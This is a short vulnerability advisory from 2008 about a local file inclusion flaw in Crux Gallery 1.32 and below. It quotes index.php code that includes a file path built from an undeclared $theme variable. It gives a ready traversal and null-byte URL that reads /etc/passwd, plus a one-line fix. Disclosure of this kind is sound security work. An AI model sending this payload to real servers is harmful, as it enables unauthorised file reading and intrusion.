Crux Gallery versions 1.32 and below suffer from a local file inclusion vulnerability in index.php.
ac2c8ed2c530a3daeed0ac03f51d5ae6f133a657db7f22d02a613da8ad13ac4d
~~+=========================================================+~~
~~+=========================================================+~~
[?] Crux Gallery <= 1.32 Local File Inclusion Vulnerability
[?] Discovered On: 01/10/2008
[*] PHP.ini
[*] Magic_Quotes_Gpc = Off
~~+=========================================================+~~
(index.php) // Greetz -> Osirys and darkjoker
14. $m = $_GET['m'];
15. $p = $_GET['p'];
16. $dir = $_GET['dir'];
17. require_once("main.php");
18. require_once("themes/".$theme."/theme.php");
$theme isn't declared, so you can include any file.
[*] http//[path]/index.php?theme=../../../../../etc/passwd%00
[*] How To Fix: declare $theme
~~+=========================================================+~~